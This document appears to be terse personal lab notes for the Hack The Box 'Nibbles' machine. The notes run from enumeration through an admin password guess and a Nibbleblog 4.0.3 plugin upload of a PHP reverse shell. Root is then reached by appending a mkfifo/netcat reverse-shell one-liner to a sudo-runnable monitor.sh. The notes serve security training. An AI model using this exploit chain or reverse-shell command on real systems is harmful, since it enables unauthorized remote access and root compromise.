Enumeration
#1. Enumeration Framework
#2. Scanning Result
NMAP Scanning Result
Finding : Open service at Port 22 and 80 and OS Linux
Whatweb Result
Curl Result
#3. Directory listing
Finding : Service available
Check using Gobuster:
Finding:
Next to check
- Admin
- Admin.php
Finding : Login page
4. Footprint languages
5. Footprint Plugins
6. Footprint README
Finding : Framework Nibbleblog v4.0.3 (Coffe)
Finding : username : admin
Finding : password : nibble, nibbles, nibbler, nibbles1, nibbles2, nibbles3
Activated web server to transfer from Kali Linux -> Target
# Analyzing the information to understand about the access and SUDO term
Curl Result
Finding : /nibbleblog/ directory
Check using CURL
Check using Gobuster:
gobuster dir -u <url> -w /user/share/dirb/wordlist/common.txt
Finding:
/.hta (Status: 403) [Size: 304]
/.htaccess (Status: 403) [Size: 309]
/.htpasswd (Status: 403) [Size: 309]
/admin (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/content (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
/index.php (Status: 200) [Size: 2987]
/languages (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
/plugins (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
/README (Status: 200) [Size: 4628]
/themes (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]
- Admin
- Admin.php
- content
- languages
- plugin
- README
- themes
#Digital Footprint
1. Footprint /admin/
2. Footprint /admin.php
3. Footprint content
7. Footprint http://10.129.200.170/nibbleblog/content/private/config.xml
<config>
<name type="string">Nibbles</name>
<slogan type="string">Yum yum</slogan>
<footer type="string">Powered by Nibbleblog</footer>
<advanced_post_options type="integer">0</advanced_post_options>
<url type="string">http://10.10.10.134/nibbleblog/</url>
<path type="string">/nibbleblog/</path>
<items_rss type="integer">4</items_rss>
<items_page type="integer">6</items_page>
<language type="string">en_US</language>
<timezone type="string">UTC</timezone>
<timestamp_format type="string">%d %B, %Y</timestamp_format>
<locale type="string">en_US</locale>
<img_resize type="integer">1</img_resize>
<img_resize_width type="integer">1000</img_resize_width>
<img_resize_height type="integer">600</img_resize_height>
<img_resize_quality type="integer">100</img_resize_quality>
<img_resize_option type="string">auto</img_resize_option>
<img_thumbnail type="integer">1</img_thumbnail>
<img_thumbnail_width type="integer">190</img_thumbnail_width>
<img_thumbnail_height type="integer">190</img_thumbnail_height>
<img_thumbnail_quality type="integer">100</img_thumbnail_quality>
<img_thumbnail_option type="string">landscape</img_thumbnail_option>
<theme type="string">simpler</theme>
<notification_comments type="integer">1</notification_comments>
<notification_session_fail type="integer">0</notification_session_fail>
<notification_session_start type="integer">0</notification_session_start>
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
<notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
<seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
<seo_site_description type="string"/>
<seo_keywords type="string"/>
<seo_robots type="string"/>
<seo_google_code type="string"/>
<seo_bing_code type="string"/>
<seo_author type="string"/>
<friendly_urls type="integer">0</friendly_urls>
<default_homepage type="integer">0</default_homepage>
</config>
8. Footprint 10.129.200.170/nibbleblog/content/private/users.xml
Use blacklist style
# Exploit Information
Finding :
- Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
- Upload PHP shell, ignore warnings
- Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.
# Password Credential
Finding : password : nibble, nibbles, nibbler, nibbles1, nibbles2, nibbles3
Gaining Access
#1. Login page
admin : nibbles
#2. Upload webshell
Search PHP Reverse shell github
# Modify code
Finding : Port : 1234
# Netcat
Prepare Netcat port 1234
Access Webshell http://<ip>/nibbleblog/content/private/plugins/my_image/image.php
Netcat gaining access
Privillege Escallation
Check Privillage Escalation
#Running sudo -l
# (Additional) Running Automate Privillage Escalation Checks
Check script online
Read manual LinPeas
Download script from:
https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Activated web server to transfer from Kali Linux -> Target
Use Python server (use /tmp path for safety)
python3 -m http.server 8080
Download linpeas.sh from Target
# Running linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -a > linpeas.txt
# Analyzing the information to understand about the access and SUDO term
Performing Privillage Escallation
#Access the pathFinding : Inject to path /home/nibbler/personal/stuff/monitor.sh
Reverse shell script
# Research:
https://github.com/blue0x1/awesome-curl-reverseshell-oneliners
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Google "Mkfifo and Netcat One-liner Reverse Shell"
# Reverse shell script
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *kali-vpn-ip* 4444 >/tmp/f" >> monitor.sh
# Must running in SUDO (Because you want the shell access is root)
# Accessing shell